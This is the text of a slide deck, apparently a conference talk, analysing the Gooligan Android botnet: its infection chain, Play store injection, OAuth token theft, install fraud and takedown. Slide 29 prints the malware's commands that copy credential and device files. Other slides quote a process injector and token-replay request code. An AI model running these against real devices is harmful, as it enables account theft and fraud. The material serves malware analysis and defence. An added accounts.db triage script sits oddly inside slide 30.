1st large scale OAuth stealing botnet - PowerPoint PPT Presentation


SLIDE 1

SLIDE 2

1st large scale OAuth stealing botnet

SLIDE 3

OAuth: a secure delegation mechanism that has become the de-facto authentication standard

SLIDE 4

SLIDE 5

Overview diagram: exploit server; registration server; C&C; repacked (non-Google) app; fraudulent app & ads promotion; Play store fake installs/comments; ads injection

SLIDE 6

Agenda: Discovery, Infection, Monetization schema, Affected devices, Remediation

SLIDE 7

SLIDE 8

Infection chain: payload decoding, exploit downloading, phone rooting, persistence setup, Play store injection. The slide labels each stage as either classic Ghost Push or Gooligan-specific.

SLIDE 9

Payload hidden in a fake image, /assets/close.png, and decoded with a hard-coded XOR function

SLIDE 10

Fake image layout: Header (10 bytes) | XOR key (10 bytes) | Stage 2 payload (XOR-encoded) | Footer (10 bytes). The diagram shows two values (Val 1, Val 2) in the header and the same two values in the footer.

SLIDE 11

Decoding script (Python 3):

import itertools
import sys

with open(sys.argv[1], 'rb') as f:
    png = f.read()
# The 10-byte XOR key sits right after the 10-byte header
key = itertools.cycle(png[10:20])
# The encoded stage 2 payload is everything between the key and the 10-byte footer
decrypted = bytes(k ^ d for k, d in zip(key, png[20:-10]))
with open(sys.argv[2], 'wb') as output:
    output.write(decrypted)

XOR key of length 10, hard-coded into the payload

SLIDE 12

Kingroot exploit pack, targeting Android 3.x and 4.x

SLIDE 13

Persistence: add utilities to the system partition; backdoor the recovery

SLIDE 14

Play store injection:
1. Inject a shared object into the Play store app
2. Listen to multiple events to wake up
3. Used to load malicious DEX files
SLIDE 15

Reference injector from LibInjectAll (find_pid_of() and inject_remote_process() are implemented elsewhere in that project; the prototypes below are inferred from the call site):

#include <stdio.h>
#include <string.h>
#include <sys/types.h>

pid_t find_pid_of(const char *process_name);
int inject_remote_process(pid_t target_pid, const char *library_path,
                          const char *function_name, const char *param,
                          size_t param_size);

int main(int argc, char** argv) {
    pid_t target_pid;
    target_pid = find_pid_of("/system/bin/surfaceflinger");
    if (-1 == target_pid) {
        printf("Can't find the process\n");
        return -1;
    }
    //target_pid = find_pid_of("/data/test");
    inject_remote_process(target_pid, "/data/libhello.so", "hook_entry",
                          "I'm parameter!", strlen("I'm parameter!"));
    return 0;
}

https://github.com/jekinleeph/LibInjectAll/blob/master/inject.c

In Gooligan: injected process pid: the Play app; library to inject: igpld.so

SLIDE 16

SLIDE 17

Discovery: the string oversea_adjust_read_redis was buried in the patient-zero sample

SLIDE 18

http://www.cnblogs.com/beautiful-code/p/5750382.html

SLIDE 19

SLIDE 20

SLIDE 21

SLIDE 22

Infrastructure addresses (partially redacted on the slide): 52.220.249.y, 139.162.2.x

SLIDE 23

SLIDE 24

SLIDE 25

Monetization: app boosting

SLIDE 26

The OAuth token is solely used to interact with the Play store. Full boosting package.

SLIDE 27

Server-based fraudulent installs are mostly ineffective.

Hence the attempt to masquerade as a real device.

SLIDE 28

Fraud pipeline steps: accounts.db access, OAuth token exchange, Play store APK injection, Play store download & review, Gooligan C&C sync

SLIDE 29

cat /data/system/users/0/accounts.db > `pwd`/.agp.d
cat /data/data/com.google.android.gms/shared_prefs/Checkin.xml > `pwd`/.agp.e
cat /data/data/com.android.vending/shared_prefs/finsky.xml > `pwd`/.agp.f

SLIDE 30

Perform SQLite queries on the copied accounts.db to find tokens; look for specific token types.
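As an added example (not the malware's code and not from the slides), the queries below show what a copy of accounts.db gives away and how a responder would triage one: which accounts and token types it contains, so the right tokens can be revoked. The schema is modelled on the accounts and authtokens tables of Android's AccountManager database but reduced to the columns the queries need; the sample rows, account names, token strings and token type names are constructed placeholders.

```python
import sqlite3
from typing import Dict, List, Optional, Sequence, Tuple

# Schema modelled on the accounts and authtokens tables of Android's AccountManager database
# (assumption: reduced to the columns the queries below need).
SCHEMA = """
CREATE TABLE accounts (
    _id INTEGER PRIMARY KEY,
    name TEXT NOT NULL,
    type TEXT NOT NULL,
    password TEXT
);
CREATE TABLE authtokens (
    _id INTEGER PRIMARY KEY,
    accounts_id INTEGER NOT NULL REFERENCES accounts(_id),
    type TEXT NOT NULL,
    authtoken TEXT
);
"""

# Constructed sample rows. Token strings are placeholders, not real credentials,
# and the token type names are illustrative.
SAMPLE_ACCOUNTS = [
    (1, "victim@example.com", "com.google", "placeholder-master-token"),
    (2, "other@example.org", "com.example.mail", None),
]
SAMPLE_TOKENS = [
    (1, 1, "androidmarket", "placeholder-play-token"),
    (2, 1, "mail", "placeholder-mail-token"),
    (3, 2, "imap", "placeholder-imap-token"),
]


def load_sample_db() -> sqlite3.Connection:
    """Build an in-memory accounts.db populated with the constructed rows above."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany("INSERT INTO accounts VALUES (?, ?, ?, ?)", SAMPLE_ACCOUNTS)
    conn.executemany("INSERT INTO authtokens VALUES (?, ?, ?, ?)", SAMPLE_TOKENS)
    conn.commit()
    return conn


def open_db(path: str) -> sqlite3.Connection:
    """Open a copied accounts.db read-only so triage cannot alter the evidence."""
    return sqlite3.connect("file:%s?mode=ro" % path, uri=True)


def find_tokens(conn: sqlite3.Connection, account_type: str = "com.google",
                token_types: Optional[Sequence[str]] = None) -> List[Tuple[str, str, str]]:
    """Rows of (account name, token type, token) for one account type, optionally
    restricted to specific token types: the 'look for specific tokens' query."""
    sql = ("SELECT a.name, t.type, t.authtoken "
           "FROM authtokens t JOIN accounts a ON a._id = t.accounts_id "
           "WHERE a.type = ?")
    params: List[str] = [account_type]
    if token_types:
        sql += " AND t.type IN (%s)" % ", ".join("?" * len(token_types))
        params.extend(token_types)
    sql += " ORDER BY a.name, t.type"
    return conn.execute(sql, params).fetchall()


def exposed_token_types(conn: sqlite3.Connection,
                        account_type: str = "com.google") -> Dict[str, List[str]]:
    """Per account, the token types a stolen copy of this database exposes; this is
    the list a responder needs when deciding what to revoke."""
    exposed: Dict[str, List[str]] = {}
    for name, token_type, _token in find_tokens(conn, account_type):
        exposed.setdefault(name, []).append(token_type)
    return exposed


def redact(token: Optional[str], keep: int = 6) -> str:
    """Shorten a token for reports so the report itself does not leak the credential."""
    if not token:
        return "<none>"
    return token[:keep] + "..." if len(token) > keep else token


if __name__ == "__main__":
    db = load_sample_db()
    for name, token_type, token in find_tokens(db):
        print("%s %-14s %s" % (name, token_type, redact(token)))
```

Point open_db at the file pulled from /data/system/users/0/accounts.db instead of load_sample_db to run the same queries on a real copy; the read-only URI keeps the triage from touching the evidence.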

SLIDE 31

Fraud pipeline steps: accounts.db access, OAuth token exchange, Play store APK injection, Play store download & review, Gooligan C&C sync

SLIDE 32

C&C sync: the malware reports phone information; the server provides the fraud instructions.

SLIDE 33

The exfiltrated data was used to mimic a realistic phone in fraudulent requests; data was also reused on non-rooted phones.

SLIDE 34

Fraud pipeline steps: accounts.db access, OAuth token exchange, Play store APK injection, Play store download & review, Gooligan C&C sync

SLIDE 35

Token exchange: get a refreshed OAuth token, solely used for Play.

SLIDE 36

Fraud pipeline steps: accounts.db access, OAuth token exchange, Play store APK injection, Play store download & review, Gooligan C&C sync

SLIDE 37

Download & review: try to mimic a real install; may leave a review.

SLIDE 38

public static AndroidAppDeliveryData purchase(Detail detail, AndroidInfo info) {
    <snip>
    header.put("X-DFE-Device-Id", DeviceUtil.deviceId);
    header.put("Authorization", "GoogleLogin auth=" + info.token);
    header.put("X-Public-Android-Id", DeviceUtil.androidId);
    header.put("X-DFE-Signature-Request", DeviceUtil.getOnceSign());
    </snip>
    NanoProtoHelper.getParsedResponseFromWrapper(
        ResponseWrapper.parseFrom(
            Utils.readBytes(new GZIPInputStream(
                Http.post("https://android.clients.google.com/fdfe/purchase",
                          json.getBytes(), header, Http.FORM)))).payload,
}

found in com.android.vending.HttpRequest

SLIDE 39

Play anti-abuse defenses removed 100% of the fake installs & comments.

Abusive apps and developers were suspended.

SLIDE 40

Ads injection

SLIDE 41

Ads injection: ads pop up for "real" apps; attribution washing

SLIDE 42

35M

SLIDE 43

SLIDE 44

Affected devices by manufacturer

SLIDE 45

Affected devices by Android version

SLIDE 46

Geo-distribution: 19% of infections from India; 80% from emerging countries

SLIDE 47

SLIDE 48

Remediation: command and control takedown; token revocation

SLIDE 49

SLIDE 50

Sinkholing analytics (fixed)

SLIDE 51

SLIDE 52

Takeaways: the OAuth botnet is an emerging threat; stronger together; extremely fast takedown

SLIDE 53

SLIDE 54

SLIDE 55